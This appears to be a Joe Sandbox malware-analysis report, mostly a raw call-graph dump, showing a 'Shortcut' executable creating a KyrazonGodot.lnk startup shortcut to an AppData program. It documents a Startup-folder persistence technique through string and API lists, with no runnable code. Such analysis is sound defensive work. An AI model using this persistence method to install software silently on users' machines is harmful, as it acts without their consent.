3092 404404 3089->3092 3384 403257 3090->3384 3093 40504d 12 API calls 3092->3093 3094 404431 3093->3094 3095 402e4a 7 API calls 3094->3095 3101 404445 3094->3101 3095->3101 3096 404488 3097 405232 7 API calls 3096->3097 3098 404494 3097->3098 3098->3033 3099 40504d 12 API calls 3099->3101 3100 402e4a 7 API calls 3100->3101 3101->3096 3101->3099 3101->3100 3103 401624 3102->3103 3183 40111b 3102->3183 3104 4016dc 3103->3104 3105 401646 3103->3105 3106 401cf0 26 API calls 3104->3106 3107 40165c CoInitialize 3105->3107 3109 4029c7 26 API calls 3105->3109 3108 401c09 3106->3108 3110 40166d 3107->3110 3111 40167c 3107->3111 3108->3035 3112 401659 3109->3112 3113 4029c7 26 API calls 3110->3113 3114 40168a 3111->3114 3154 4019ce 3111->3154 3112->3107 3113->3111 3115 401691 3114->3115 3116 40182f 3114->3116 3118 401694 3115->3118 3119 4016eb 3115->3119 3117 402420 32 API calls 3116->3117 3121 401834 3117->3121 3456 401cf0 3118->3456 3536 402420 CoCreateInstance 3119->3536 3127 4029c7 26 API calls 3121->3127 3164 40184a 3121->3164 3123 402bfd 15 API calls 3123->3183 3125 4016a3 3129 401b6c CoUninitialize 3125->3129 3449 4029c7 3125->3449 3126 401706 3126->3125 3131 4029c7 26 API calls 3126->3131 3127->3164 3128 4029c7 26 API calls 3128->3126 3132 401b80 3129->3132 3134 401720 3131->3134 3135 401ba1 3132->3135 3136 401bb8 3132->3136 3137 4029c7 26 API calls 3132->3137 3140 4029c7 26 API calls 3134->3140 3135->3136 3141 4029c7 26 API calls 3135->3141 3138 401bd9 3136->3138 3139 401bbf 3136->3139 3137->3135 3143 4029c7 26 API calls 3138->3143 3142 4029c7 26 API calls 3139->3142 3144 401732 3140->3144 3141->3136 3145 401bc9 3142->3145 3146 401be4 3143->3146 3147 4029c7 26 API calls 3144->3147 3145->3035 3573 401c20 3146->3573 3148 401744 3147->3148 3150 4029c7 26 API calls 3148->3150 3152 401756 3150->3152 3153 4029c7 26 API calls 3152->3153 3155 401768 3153->3155 3408 402160 CoCreateInstance 3154->3408 3156 4029c7 26 API calls 3155->3156 3158 40177a 3156->3158 3160 4029c7 26 API calls 3158->3160 3159 401b3d 3159->3129 3162 4029c7 26 API calls 3159->3162 3161 40178c 3160->3161 3163 4029c7 26 API calls 3161->3163 3162->3125 3165 4017a0 3163->3165 3164->3125 3166 402160 28 API calls 3164->3166 3167 4029c7 26 API calls 3165->3167 3168 4019ba 3166->3168 3169 4017b9 3167->3169 3168->3129 3168->3159 3170 4029c7 26 API calls 3169->3170 3171 4017d1 3170->3171 3558 401fa0 3171->3558 3172 402a83 6 API calls 3172->3183 3173 402a8e 15 API calls 3173->3183 3175 4017e6 3176 4029c7 26 API calls 3175->3176 3177 401808 3176->3177 3178 4029c7 26 API calls 3177->3178 3180 40181a 3178->3180 3179 4029c7 26 API calls 3179->3183 3181 4029c7 26 API calls 3180->3181 3182 401827 3181->3182 3182->3125 3183->3103 3183->3104 3183->3123 3183->3172 3183->3173 3183->3179 3184 4016b0 3183->3184 3185 4029c7 26 API calls 3184->3185 3186 4016c9 3185->3186 3186->3035 3188 402e78 3187->3188 3189 402e7d 3187->3189 3190 404d78 7 API calls 3188->3190 3191 404db1 7 API calls 3189->3191 3190->3189 3192 402e86 ExitProcess 3191->3192 3194 4044c2 GetModuleFileNameA 3193->3194 3195 4044bd 3193->3195 3197 4044e5 3194->3197 3196 403257 19 API calls 3195->3196 3196->3194 3198 40504d 12 API calls 3197->3198 3199 404506 3198->3199 3200 404516 3199->3200 3201 402e4a 7 API calls 3199->3201 3200->3031 3201->3200 3622 4041bb 3202->3622 3205 40426e 3206 40427a 3205->3206 3207 4043a3 UnhandledExceptionFilter 3206->3207 3208 402e3c 3206->3208 3207->3208 3232 405760 3209->3232 3212 404a45 GetEnvironmentVariableA 3216 404a64 3212->3216 3220 404b22 3212->3220 3213 404a2b 3213->3212 3214 404a3d 3213->3214 3214->3045 3214->3047 3217 404aa9 GetModuleFileNameA 3216->3217 3219 404aa1 3216->3219 3217->3219 3219->3220 3234 405bb5 3219->3234 3220->3214 3237 4049d5 GetModuleHandleA 3220->3237 3222 405f84 3221->3222 3222->3050 3224 4067c6 3223->3224 3225 4067cd HeapAlloc 3223->3225 3226 4067ea VirtualAlloc 3224->3226 3225->3226 3231 406822 3225->3231 3227 40680a VirtualAlloc 3226->3227 3228 4068df 3226->3228 3229 4068d1 VirtualFree 3227->3229 3227->3231 3230 4068e7 HeapFree 3228->3230 3228->3231 3229->3228 3230->3231 3231->3050 3233 404a0f GetVersionExA 3232->3233 3233->3212 3233->3213 3239 405bcc 3234->3239 3238 4049ec 3237->3238 3238->3214 3241 405be4 3239->3241 3242 405c14 3241->3242 3246 403d21 3241->3246 3243 405bc8 3242->3243 3244 403d21 6 API calls 3242->3244 3250 407324 3242->3250 3243->3220 3244->3242 3247 403d3f 3246->3247 3249 403d33 3246->3249 3256 404f04 3247->3256 3249->3241 3251 40734f 3250->3251 3252 407332 3250->3252 3253 40736b 3251->3253 3254 403d21 6 API calls 3251->3254 3252->3242 3253->3252 3268 403e8d 3253->3268 3254->3253 3257 404f4d 3256->3257 3258 404f35 GetStringTypeW 3256->3258 3260 404f78 GetStringTypeA 3257->3260 3261 404f9c 3257->3261 3258->3257 3259 404f51 GetStringTypeA 3258->3259 3259->3257 3262 405039 3259->3262 3260->3262 3261->3262 3264 404fb2 MultiByteToWideChar 3261->3264 3262->3249 3264->3262 3265 404fd6 3264->3265 3265->3262 3266 405010 MultiByteToWideChar 3265->3266 3266->3262 3267 405029 GetStringTypeW 3266->3267 3267->3262 3269 403ed9 3268->3269 3270 403ebd LCMapStringW 3268->3270 3272 403f22 LCMapStringA 3269->3272 3273 403f3f 3269->3273 3270->3269 3271 403ee1 LCMapStringA 3270->3271 3271->3269 3280 40401b 3271->3280 3272->3280 3274 403f55 MultiByteToWideChar 3273->3274 3273->3280 3275 403f7f 3274->3275 3274->3280 3276 403fb5 MultiByteToWideChar 3275->3276 3275->3280 3277 403fce LCMapStringW 3276->3277 3276->3280 3278 403fe9 3277->3278 3277->3280 3279 403fef 3278->3279 3282 40402f 3278->3282 3279->3280 3281 403ffd LCMapStringW 3279->3281 3280->3252 3281->3280 3282->3280 3283 404067 LCMapStringW 3282->3283 3283->3280 3284 40407f WideCharToMultiByte 3283->3284 3284->3280 3295 40505f 3286->3295 3289 402e4a 3290 402e53 3289->3290 3291 402e58 3289->3291 3334 404d78 3290->3334 3340 404db1 3291->3340 3296 40483b 3295->3296 3298 405066 3295->3298 3296->3055 3296->3289 3298->3296 3299 40508b 3298->3299 3300 40509a 3299->3300 3303 4050af 3299->3303 3301 4050a8 3300->3301 3310 406304 3300->3310 3304 4050ee RtlAllocateHeap 3301->3304 3305 4050ad 3301->3305 3303->3301 3303->3304 3306 4050cf 3303->3306 3307 4050fd 3304->3307 3305->3298 3316 406ab1 3306->3316 3307->3298 3309 4050da 3309->3304 3309->3307 3314 406336 3310->3314 3311 4063d5 3313 4063e4 3311->3313 3330 4066be 3311->3330 3313->3301 3314->3311 3314->3313 3323 40660d 3314->3323 3317 406abf 3316->3317 3318 406bab VirtualAlloc 3317->3318 3319 406c80 3317->3319 3322 406b7c 3317->3322 3318->3322 3320 4067b9 5 API calls 3319->3320 3320->3322 3322->3309 3324 406650 HeapAlloc 3323->3324 3325 406620 HeapReAlloc 3323->3325 3326 4066a0 3324->3326 3328 406676 VirtualAlloc 3324->3328 3325->3326 3327 40663f 3325->3327 3326->3311 3327->3324 3328->3326 3329 406690 HeapFree 3328->3329 3329->3326 3331 4066d0 VirtualAlloc 3330->3331 3333 406719 3331->3333 3333->3313 3335 404d82 3334->3335 3336 404db1 7 API calls 3335->3336 3339 404daf 3335->3339 3337 404d99 3336->3337 3338 404db1 7 API calls 3337->3338 3338->3339 3339->3291 3342 404dc4 3340->3342 3341 402e61 3341->3055 3342->3341 3343 404edb 3342->3343 3344 404e04 3342->3344 3345 404eee GetStdHandle WriteFile 3343->3345 3344->3341 3346 404e10 GetModuleFileNameA 3344->3346 3345->3341 3347 404e28 3346->3347 3349 406ddd 3347->3349 3350 406dea LoadLibraryA 3349->3350 3351 406e2c 3349->3351 3350->3351 3352 406dfb GetProcAddress 3350->3352 3351->3341 3352->3351 3353 406e12 GetProcAddress GetProcAddress 3352->3353 3353->3351 3355 40523e 3354->3355 3363 40525a 3354->3363 3356 40525e 3355->3356 3359 405248 3355->3359 3357 405289 3356->3357 3362 405278 3356->3362 3358 40528a HeapFree 3357->3358 3358->3363 3359->3358 3360 405254 3359->3360 3365 405fdb 3360->3365 3371 406a6c 3362->3371 3363->3085 3366 406019 3365->3366 3370 4062cf 3365->3370 3367 406215 VirtualFree 3366->3367 3366->3370 3368 406279 3367->3368 3369 406288 VirtualFree HeapFree 3368->3369 3368->3370 3369->3370 3370->3363 3372 406aaf 3371->3372 3373 406a99 3371->3373 3372->3363 3373->3372 3375 406953 3373->3375 3378 406960 3375->3378 3376 406a10 3376->3372 3377 406981 VirtualFree 3377->3378 3378->3376 3378->3377 3380 4068fd VirtualFree 3378->3380 3381 40691a 3380->3381 3382 40694a 3381->3382 3383 40692a HeapFree 3381->3383 3382->3378 3383->3378 3385 403260 3384->3385 3386 403267 3384->3386 3388 402e93 3385->3388 3386->3092 3395 40302c 3388->3395 3390 403020 3390->3386 3393 402ed6 GetCPInfo 3394 402eea 3393->3394 3394->3390 3400 4030d2 GetCPInfo 3394->3400 3396 40304c 3395->3396 3397 40303c GetOEMCP 3395->3397 3398 403051 GetACP 3396->3398 3399 402ea4 3396->3399 3397->3396 3398->3399 3399->3390 3399->3393 3399->3394 3401 4031bd 3400->3401 3405 4030f5 3400->3405 3401->3390 3402 404f04 6 API calls 3403 403171 3402->3403 3404 403e8d 9 API calls 3403->3404 3406 403195 3404->3406 3405->3402 3407 403e8d 9 API calls 3406->3407 3407->3401 3409 40218b 3408->3409 3412 402196 3408->3412 3410 4029c7 26 API calls 3409->3410 3410->3412 3411 4021c6 3414 4021e6 3411->3414 3415 402207 3411->3415 3416 4021fa 3411->3416 3412->3411 3413 4029c7 26 API calls 3412->3413 3412->3416 3413->3411 3414->3416 3417 4029c7 26 API calls 3414->3417 3418 40221c 3415->3418 3419 40223d 3415->3419 3416->3159 3417->3416 3418->3416 3420 4029c7 26 API calls 3418->3420 3421 402252 3419->3421 3422 402273 3419->3422 3423 402230 3420->3423 3421->3416 3424 4029c7 26 API calls 3421->3424 3426 40228a 3422->3426 3427 4022af 3422->3427 3423->3159 3425 402266 3424->3425 3425->3159 3426->3416 3428 4029c7 26 API calls 3426->3428 3430 4022cb 3427->3430 3432 4022f0 3427->3432 3429 4022a2 3428->3429 3429->3159 3430->3416 3431 4029c7 26 API calls 3430->3431 3433 4022e3 3431->3433 3434 402308 3432->3434 3435 40232d 3432->3435 3433->3159 3434->3416 3436 4029c7 26 API calls 3434->3436 3438 402342 3435->3438 3439 402367 MultiByteToWideChar 3435->3439 3437 402320 3436->3437 3437->3159 3438->3416 3440 4029c7 26 API calls 3438->3440 3441 402393 3439->3441 3442 40235a 3440->3442 3443 402399 3441->3443 3446 4023be 3441->3446 3442->3159 3443->3416 3444 4029c7 26 API calls 3443->3444 3445 4023b1 3444->3445 3445->3159 3446->3416 3447 4029c7 26 API calls 3446->3447 3448 4023eb 3447->3448 3448->3159 3583 403337 3449->3583 3455 401b69 3455->3129 3457 401d40 3456->3457 3458 4029c7 26 API calls 3457->3458 3459 401d75 3458->3459 3460 4029c7 26 API calls 3459->3460 3461 401d8c 3460->3461 3462 4029c7 26 API calls 3461->3462 3463 401d99 3462->3463 3464 4029c7 26 API calls 3463->3464 3465 401dab 3464->3465 3466 4029c7 26 API calls 3465->3466 3467 401db8 3466->3467 3468 4029c7 26 API calls 3467->3468 3469 401dc5 3468->3469 3470 4029c7 26 API calls 3469->3470 3471 401dd2 3470->3471 3472 4029c7 26 API calls 3471->3472 3473 401ddf 3472->3473 3474 4029c7 26 API calls 3473->3474 3475 401df1 3474->3475 3476 4029c7 26 API calls 3475->3476 3477 401dfe 3476->3477 3478 4029c7 26 API calls 3477->3478 3479 401e0b 3478->3479 3480 4029c7 26 API calls 3479->3480 3481 401e18 3480->3481 3482 4029c7 26 API calls 3481->3482 3483 401e25 3482->3483 3484 4029c7 26 API calls 3483->3484 3485 401e32 3484->3485 3486 4029c7 26 API calls 3485->3486 3487 401e3f 3486->3487 3488 4029c7 26 API calls 3487->3488 3489 401e4c 3488->3489 3490 4029c7 26 API calls 3489->3490 3491 401e59 3490->3491 3492 4029c7 26 API calls 3491->3492 3493 401e66 3492->3493 3494 4029c7 26 API calls 3493->3494 3495 401e73 3494->3495 3496 4029c7 26 API calls 3495->3496 3497 401e80 3496->3497 3498 4029c7 26 API calls 3497->3498 3499 401e8d 3498->3499 3500 4029c7 26 API calls 3499->3500 3501 401e9a 3500->3501 3502 4029c7 26 API calls 3501->3502 3503 401ea7 3502->3503 3504 4029c7 26 API calls 3503->3504 3505 401eb4 3504->3505 3506 4029c7 26 API calls 3505->3506 3507 401ec1 3506->3507 3508 4029c7 26 API calls 3507->3508 3509 401ece 3508->3509 3510 4029c7 26 API calls 3509->3510 3511 401edb 3510->3511 3512 4029c7 26 API calls 3511->3512 3513 401ee8 3512->3513 3514 4029c7 26 API calls 3513->3514 3515 401ef5 3514->3515 3516 4029c7 26 API calls 3515->3516 3517 401f07 3516->3517 3518 4029c7 26 API calls 3517->3518 3519 401f19 3518->3519 3520 4029c7 26 API calls 3519->3520 3521 401f2b 3520->3521 3522 4029c7 26 API calls 3521->3522 3523 401f38 3522->3523 3524 4029c7 26 API calls 3523->3524 3525 401f45 3524->3525 3526 4029c7 26 API calls 3525->3526 3527 401f54 3526->3527 3528 4029c7 26 API calls 3527->3528 3529 401f61 3528->3529 3530 4029c7 26 API calls 3529->3530 3531 401f6e 3530->3531 3532 4029c7 26 API calls 3531->3532 3533 401f7b 3532->3533 3534 4029c7 26 API calls 3533->3534 3535 401f88 3534->3535 3535->3125 3537 40251f 3536->3537 3541 40252a 3536->3541 3539 4029c7 26 API calls 3537->3539 3538 4016f0 3538->3126 3538->3128 3539->3541 3540 40255e 3540->3538 3543 402569 MultiByteToWideChar 3540->3543 3541->3538 3541->3540 3542 4029c7 26 API calls 3541->3542 3542->3540 3544 40259b 3543->3544 3545 4029c7 26 API calls 3544->3545 3546 4025b1 3544->3546 3545->3546 3546->3538 3547 4029c7 26 API calls 3546->3547 3549 4025e1 3546->3549 3547->3549 3548 402623 3551 402630 ExpandEnvironmentStringsA 3548->3551 3552 402672 3548->3552 3549->3538 3549->3548 3550 4029c7 26 API calls 3549->3550 3550->3548 3551->3552 3553 4026b4 ExpandEnvironmentStringsA 3552->3553 3554 4026f6 3552->3554 3553->3554 3555 402735 ExpandEnvironmentStringsA 3554->3555 3556 402771 3554->3556 3555->3556 3556->3538 3557 4027d4 ExpandEnvironmentStringsA 3556->3557 3557->3538 3559 401fb0 3558->3559 3560 402137 3558->3560 3561 4029c7 26 API calls 3559->3561 3564 401fdd 3559->3564 3560->3175 3561->3564 3562 401fe9 MapVirtualKeyA GetKeyNameTextA 3563 40203b 3562->3563 3565 402040 MapVirtualKeyA GetKeyNameTextA 3563->3565 3566 402092 3563->3566 3564->3562 3564->3563 3565->3566 3567 402097 MapVirtualKeyA GetKeyNameTextA 3566->3567 3568 4020e9 MapVirtualKeyA 3566->3568 3567->3568 3569 402117 GetKeyNameTextA 3568->3569 3570 4020f9 3568->3570 3569->3175 3570->3569 3571 4029c7 26 API calls 3570->3571 3572 402114 3571->3572 3572->3569 3574 401c53 3573->3574 3575 401c6b FormatMessageA 3573->3575 3574->3575 3576 401c5b LoadLibraryExA 3574->3576 3577 401c95 3575->3577 3578 401cd7 3575->3578 3576->3575 3579 4029c7 26 API calls 3577->3579 3580 401bea 3578->3580 3581 401cdb FreeLibrary 3578->3581 3582 401cc9 LocalFree 3579->3582 3580->3035 3581->3580 3582->3578 3585 403344 3583->3585 3584 4029d5 3587 403401 3584->3587 3585->3584 3586 40504d 12 API calls 3585->3586 3586->3584 3588 4029e6 3587->3588 3595 403429 __aulldiv __aullrem 3587->3595 3596 4033c4 3588->3596 3589 403b9f 18 API calls 3589->3595 3590 40504d 12 API calls 3590->3595 3591 40531b WideCharToMultiByte 3591->3595 3592 405232 7 API calls 3592->3595 3593 403bd4 18 API calls 3593->3595 3594 403c05 18 API calls 3594->3595 3595->3588 3595->3589 3595->3590 3595->3591 3595->3592 3595->3593 3595->3594 3597 4033cc 3596->3597 3598 4033ee 3596->3598 3602 4033fe 3597->3602 3603 405160 3597->3603 3600 405160 6 API calls 3598->3600 3598->3602 3600->3602 3602->3455 3604 405176 3603->3604 3606 4033dc 3603->3606 3604->3606 3607 40703a 3604->3607 3606->3455 3609 407055 3607->3609 3612 407084 3607->3612 3608 407098 3611 40716a WriteFile 3608->3611 3615 4070a9 3608->3615 3609->3608 3609->3612 3617 4071f0 3609->3617 3611->3612 3613 40718c GetLastError 3611->3613 3612->3606 3613->3612 3614 4070f5 WriteFile 3614->3615 3616 40715f GetLastError 3614->3616 3615->3612 3615->3614 3616->3612 3618 4071ff 3617->3618 3621 407228 3617->3621 3619 407234 SetFilePointer 3618->3619 3618->3621 3620 40724c GetLastError 3619->3620 3619->3621 3620->3621 3621->3608 3623 4041c7 GetCurrentProcess TerminateProcess 3622->3623 3624 4041d8 3622->3624 3623->3624 3625 402e2b 3624->3625 3626 404242 ExitProcess 3624->3626 3625->3205 3627 4041bb 3628 4041c7 GetCurrentProcess TerminateProcess 3627->3628 3629 4041d8 3627->3629 3628->3629 3630 404252 3629->3630 3631 404242 ExitProcess 3629->3631 3637 403d0d 3643 4051bc 3637->3643 3639 403d20 3640 403d12 3640->3639 3642 405232 7 API calls 3640->3642 3646 4072ce 3640->3646 3642->3640 3656 4051c5 3643->3656 3647 4072e3 3646->3647 3648 4072de 3646->3648 3647->3648 3649 405160 6 API calls 3647->3649 3648->3640 3650 4072ed 3649->3650 3660 4078f6 3650->3660 3654 4072fd 3654->3648 3655 405232 7 API calls 3654->3655 3655->3648 3657 4051c3 3656->3657 3658 4051d6 3656->3658 3657->3640 3658->3657 3659 405125 8 API calls 3658->3659 3659->3658 3661 407902 3660->3661 3662 4072f5 3660->3662 3661->3662 3663 405232 7 API calls 3661->3663 3664 407843 3662->3664 3663->3662 3665 4078c4 3664->3665 3666 407857 3664->3666 3665->3654 3666->3665 3667 4078bc 3666->3667 3669 4078a6 CloseHandle 3666->3669 3671 407725 3667->3671 3669->3667 3670 4078b2 GetLastError 3669->3670 3670->3667 3672 40777e 3671->3672 3674 407733 3671->3674 3672->3665 3673 407778 SetStdHandle 3673->3672 3674->3672 3674->3673 3720 402e3f 3721 402e4a 3720->3721 3727 4041aa 3720->3727 3723 402e58 3721->3723 3724 404d78 7 API calls 3721->3724 3725 404db1 7 API calls 3723->3725 3724->3723 3726 402e61 3725->3726 3728 4041bb 3 API calls 3727->3728 3729 4041b7 3728->3729 3729->3721

                                                                                      Executed Functions

                                                                                      Function 00401000 Relevance: 65.5, APIs: 2, Strings: 41, Instructions: 975COMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 0 401000-401115 1 401624-40162b 0->1 2 40111b-401122 0->2 3 401631-401640 1->3 4 401bfa-401c03 1->4 5 401125-401137 call 402bfd 2->5 3->4 7 401646-40164d 3->7 6 401c04-401c1b call 401cf0 4->6 17 4016dc-4016e6 5->17 18 40113d-40114f call 402bfd 5->18 10 40165c-40166b CoInitialize 7->10 11 40164f-401659 call 4029c7 7->11 15 40166d-40167c call 4029c7 10->15 16 40167f-401684 10->16 11->10 15->16 21 40168a-40168b 16->21 22 4019ce-4019e5 call 4028e0 16->22 17->6 18->17 33 401155-401167 call 402bfd 18->33 25 401691-401692 21->25 26 40182f-40183d call 402420 21->26 37 4019e7-401a0c 22->37 38 401a0e-401a25 call 4028e0 22->38 30 401694-4016ab call 401cf0 25->30 31 4016eb-4016f9 call 402420 25->31 41 40184d-40184f 26->41 42 40183f-40184a call 4029c7 26->42 52 401b56-401b5d 30->52 48 401709-40170b 31->48 49 4016fb-401706 call 4029c7 31->49 33->17 47 40116d-40117f call 402bfd 33->47 37->38 53 401a27-401a4c 38->53 54 401a4e-401a65 call 4028e0 38->54 51 401855-40186c call 4028e0 41->51 41->52 42->41 47->17 72 401185-4011a7 call 402a8e 47->72 48->52 59 401711-40182a call 4029c7 * 10 call 401fa0 call 4029c7 * 3 48->59 49->48 70 401895-4018ac call 4028e0 51->70 71 40186e-401893 51->71 57 401b6c-401b7e CoUninitialize 52->57 58 401b5f-401b69 call 4029c7 52->58 53->54 83 401a67-401a8c 54->83 84 401a8e-401a9c 54->84 68 401b80-401b85 57->68 69 401b87-401b94 57->69 58->57 59->52 68->69 76 401ba4-401bab 68->76 77 401b96-401ba1 call 4029c7 69->77 78 401bbb-401bbd 69->78 97 4018d5-4018ec call 4028e0 70->97 98 4018ae-4018d3 70->98 71->70 100 4011e1-401203 call 402a8e 72->100 101 4011a9-4011dc 72->101 76->78 81 401bad-401bb8 call 4029c7 76->81 77->76 85 401bd9-401bf9 call 4029c7 call 401c20 78->85 86 401bbf-401bd8 call 4029c7 78->86 81->78 83->84 92 401aa8-401abc call 4028e0 84->92 93 401a9e 84->93 115 401ae8-401af0 92->115 116 401abe-401ae2 92->116 93->92 119 401915-40191e 97->119 120 4018ee-401913 97->120 98->97 121 4012d1-4012f3 call 402a8e 100->121 122 401209-40123a call 402a8e 100->122 108 401609-40161e 101->108 108->1 108->5 123 401af2 115->123 124 401af8-401b0f call 4028e0 115->124 116->115 127 401920 119->127 128 401925-401939 call 4028e0 119->128 120->119 139 4012f5-40132a 121->139 140 40132f-401351 call 402a8e 121->140 141 401249-40127c call 402a8e 122->141 142 40123c-401244 122->142 123->124 136 401b11-401b36 124->136 137 401b38 call 402160 124->137 127->128 148 401965-40196d 128->148 149 40193b-40195f 128->149 136->137 153 401b3d-401b46 137->153 139->108 161 401353-401388 140->161 162 40138d-4013af call 402a8e 140->162 156 40128b-4012be call 402a8e 141->156 157 40127e-401286 141->157 142->108 151 401975-40198c call 4028e0 148->151 152 40196f 148->152 149->148 170 4019b5-4019c3 call 402160 151->170 171 40198e-4019b3 151->171 152->151 153->57 159 401b48-401b53 call 4029c7 153->159 156->108 176 4012c4-4012cc 156->176 157->108 159->52 161->108 174 4013b1-4013e6 162->174 175 4013eb-40140d call 402a8e 162->175 170->57 183 4019c9 170->183 171->170 174->108 185 401432-401454 call 402a8e 175->185 186 40140f-40142d call 402a83 175->186 176->108 183->159 195 40145a-401493 185->195 196 40150e-401530 call 402a8e 185->196 186->108 198 401495-4014a5 call 4029c7 195->198 199 4014a8-4014bd call 402967 195->199 208 401532-401557 call 402a83 196->208 209 40158c-4015ae call 402a8e 196->209 198->199 199->108 210 4014c3-4014d5 199->210 208->108 219 40155d-40158a call 4029c7 * 2 208->219 222 4015b0-4015e5 209->222 223 4015e7-4015f9 call 4028e0 209->223 215 4014e4 210->215 216 4014d7-4014e2 call 402a83 210->216 221 4014e6-4014f0 215->221 216->221 219->108 221->108 226 4014f6-401509 call 4029c7 221->226 222->108 233 4016b0-4016db call 4029c7 223->233 234 4015ff 223->234 226->108 234->108
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923463426.000000000040C000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923494083.000000000040F000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_12_2_400000_Shortcut.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeUninitialize
                                                                                      • String ID: Arguments=%s$ArgumentsExpanded=%s$Calling CoInitialize()$Calling CoUninitialize()$Description=%s$Exiting with result code [%i]$HOTKEYF_ALT: [%i], HOTKEYF_CONTROL: [%i], HOTKEYF_EXT: [%i], HOTKEYF_SHIFT: [%i]$HRESULT_CODE(ResultCode): [%i]$HotKey=%i (%s)$IconLocation=%s,%i$IconLocationExpanded=%s,%i$RunStyle=%i$SelectedMode: [%i]$ShellLinkCreate() returned [%i]$ShellLinkQuery() returned [%i]$System error %i has occurred.$TargetPath=%s$TargetPathExpanded=%s$The command completed successfully.$The parameter "%s" is invalid.The syntax of the command is incorrect.$WorkingDirectory=%s$WorkingDirectoryExpanded=%s$[%s]$szIconLocation: [%s], iIconIndex: [%i]$wHotKey: [%i]$*undefined*$*undefined*$-help$/A:$/D:$/F:$/H:$/I:$/MegaDeth$/P:$/R:$/T:$/W:$/help$C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk
                                                                                      • API String ID: 3442037557-4155593404
                                                                                      • Opcode ID: cd8161645067e630dad6a5539a586d8c68069ecbf6e443173d7559f8e8043637
                                                                                      • Instruction ID: 4cec52f0b69b802efb3a464ec667cbab768a5943839b9d430e7b4baeac5de826
                                                                                      • Opcode Fuzzy Hash: cd8161645067e630dad6a5539a586d8c68069ecbf6e443173d7559f8e8043637
                                                                                      • Instruction Fuzzy Hash: 3A524571B4020047DB2896759D46A6B76C5AB84325F28073FFC1AB32D2EEFDDD04869D
                                                                                      Function 00402160 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 236comCOMMON
                                                                                      Download Yara Rule

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 238 402160-402189 CoCreateInstance 239 402199-40219b 238->239 240 40218b-402196 call 4029c7 238->240 242 4021fd-402206 239->242 243 40219d-4021b9 239->243 240->239 246 4021c9-4021cb 243->246 247 4021bb-4021c6 call 4029c7 243->247 248 4021d1-4021e4 246->248 249 402402-40240e 246->249 247->246 254 4021e6-4021ed 248->254 255 402207-40221a 248->255 249->242 256 402414-40241d 249->256 254->242 257 4021ef-4021fa call 4029c7 254->257 261 40221c-402223 255->261 262 40223d-402250 255->262 257->242 261->242 263 402225-40223c call 4029c7 261->263 266 402252-402259 262->266 267 402273-402288 262->267 266->242 269 40225b-402272 call 4029c7 266->269 273 40228a-402291 267->273 274 4022af-4022c9 267->274 273->242 275 402297-4022ae call 4029c7 273->275 278 4022f0-402306 274->278 279 4022cb-4022d2 274->279 285 402308-40230f 278->285 286 40232d-402340 278->286 279->242 281 4022d8-4022ef call 4029c7 279->281 285->242 287 402315-40232c call 4029c7 285->287 291 402342-402349 286->291 292 402367-40238f MultiByteToWideChar 286->292 291->242 293 40234f-402366 call 4029c7 291->293 295 402393-402397 292->295 297 402399-4023a0 295->297 298 4023be-4023d1 295->298 297->242 299 4023a6-4023bd call 4029c7 297->299 303 4023d3-4023da 298->303 304 4023f8-4023fd 298->304 303->242 305 4023e0-4023f7 call 4029c7 303->305 304->249
                                                                                      APIs
                                                                                      • CoCreateInstance.OLE32(00408150,00000000,00000001,00408140,00000000,6E696665), ref: 0040217A
                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk,000000FF,?,00000104), ref: 0040237C
                                                                                      Strings
                                                                                      • IPersistFile::SaveCompleted() failed with [%i], xrefs: 004023E1
                                                                                      • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KyrazonGodot.lnk, xrefs: 00402373
                                                                                      • IShellLink::SetShowCmd() failed with [%i], xrefs: 00402298
                                                                                      • CoCreateInstance() returned [%d], xrefs: 0040218C
                                                                                      • IShellLink::SetPath() failed with [%i], xrefs: 004021F0
                                                                                      • C:\Users\user\AppData\Local\Programs\KyrazonGodot\KyrazonGodot.exe, xrefs: 004021D5
                                                                                      • IShellLink::SetDescription() failed with [%i], xrefs: 00402350
                                                                                      • IShellLink::SetHotkey() failed with [%i], xrefs: 00402316
                                                                                      • IShellLink::SetIconLocation() failed with [%i], xrefs: 004022D9
                                                                                      • IShellLink::QueryInterface() returned [%d], xrefs: 004021BC
                                                                                      • IShellLink::SetArguments() failed with [%i], xrefs: 00402226
                                                                                      • IPersistFile::Save() failed with [%i], xrefs: 004023A7
                                                                                      • IShellLink::SetWorkingDirectory() failed with [%i], xrefs: 0040225C
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000C.00000002.1923375563.0000000000401000.00000020.00000001.01000000.00000012.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 0000000C.00000002.1923358705.0000000000400000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923396555.0000000000408000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923418046.0000000000409000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                      • Associated: 0000000C.00000002.1923444056.000000000040A000.00000008.00000001.01000000.00000012.sdmpDownload File
